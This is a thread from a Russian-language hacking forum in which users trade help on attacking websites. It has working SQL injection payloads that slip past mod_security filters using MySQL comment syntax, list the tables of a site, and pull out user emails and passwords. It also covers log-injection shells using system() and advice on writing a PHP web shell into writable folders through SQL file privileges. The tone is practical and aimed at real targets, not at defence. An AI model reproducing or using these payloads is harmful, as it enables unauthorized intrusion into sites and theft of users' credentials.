Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Все файлы перестали открываться и /etc/passwd и /etc/httpd/config/httpd.conf?
    Если сама дырка осталась, то вряд ли system() запретили.
    Ссылку в студию?
     
  2. trafbot

    trafbot New Member

    Joined:
    27 May 2010
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Перестал открываться сам лог только, в который и было записано system(), я вот думаю system был отключен и это вызывало ошибку, а вывод самой ошибки был закрыт. Идея имеет право на жизнь, как думаете??? И работал кто-то с логами напрямую для шелов? Все остальное осталось как было. Причем это было на двух логах этой дыры. Дома на днях поищу ссыль.
     
    1 person likes this.
  3. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    trafbot
    Чтобы не гадать насчет отключения system, поищи php.ini.
     
  4. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Раскрою тебе небольшой секрет, если написать %3A, и : в браузере, разницы небудет, ога?
     
  5. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    нужен скрипт для блайнд-скуль с использованием more1row.Подскажите таковой!)
     
  6. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    ну это понятное дело, вам кажется не хватает "практики" по sql инъекциям
     
  7. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    Toolza от Pashkela.
    Поддерживает и floor(rand()) и NAME_CONST
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    floor(rand()) и NAME_CONST поддерживают руки, для них скрипты не нужны.

    Снейк просит скрипт для чистого блайнда more1row, разве в этом скрипте такое есть?

    Я не увидел, хотя возможно не там искал, ведь я скептически отношусь к разработкам автора :) если и правда есть, покажи будь так добр
     
    2 people like this.
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ) ми уже усовершенствовал скрипт децл, спешиал фор $n@ke, скоро будут выложены обновления в соответствующей теме
     
    1 person likes this.
  10. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Спасибо.Toolza уже работает отлично!))
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ребят вот так я обошел фильтрацию на union select

    id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,3,4

    но тут еще есть фильтрация на information_schema, а как с этим быть?
     
    _________________________
  12. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Oбходится также: from/*!information_schema.tables*/
    Кстати, обычно чтобы обойти данную фильтрацию (mod_security), достаточно заключить в комментарии один из операторов. Например /*!union*/select
     
    2 people like this.
  13. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    id=2/**/and/**/1=0/**//*!union+select+1,2,table_name,4+from+information_schema.tables*/--
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    Iceangel_ & pinch

    не катит (

    вот интересно information_schema.columns работает а information_schema.tables не работает

    брутил имя таблицы "member"

    и вот такой запрос получилось

    id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,column_name,4+from+/*!information_schema.columns*/+/*!where*/+/*!table_name*/=/*!CHAR*/(109,101,109,98,101,114)

    ...

    Hasta la vista baby

    id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Password),1),1),4+from+/*!member*/

    :)
     
    _________________________
    #13214 Konqi, 28 May 2010
    Last edited: 28 May 2010
  15. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    есть sql, хочу создать пхп файл

    1. file_priv=Y
    2. magic_quotes_gpc=off
    3. есть полный путь
    4. есть папка icons

    читаю файлики с помощью load_file, но создать файл не выходит в чем может быть проблема?
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    pinch

    a в папке icons есть права на запись? :)
     
    _________________________
    1 person likes this.
  17. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    видимо нет=))) что можно сделать, поискать папки на запись? или можно еще чтото сделать?
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886

    первый вариант, смотри на папки типа template
     
    _________________________
  19. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    pinch, посканьте сайт каким-нить сканером директорий, затем методом тыка поищите каталог на запись
     
    1 person likes this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    pinch посмотри если сайт на кмс построен, соответсвенно скачай и посмотри какие папки есть и пробуй всe, ну и конечно пробуй папки: store, tmp,temp,img,im,admin,adm,cache,images,upl,uploads ........etc... если в них нет ограничений по исполнению в .htaccess
     
    1 person likes this.
Thread Status:
Not open for further replies.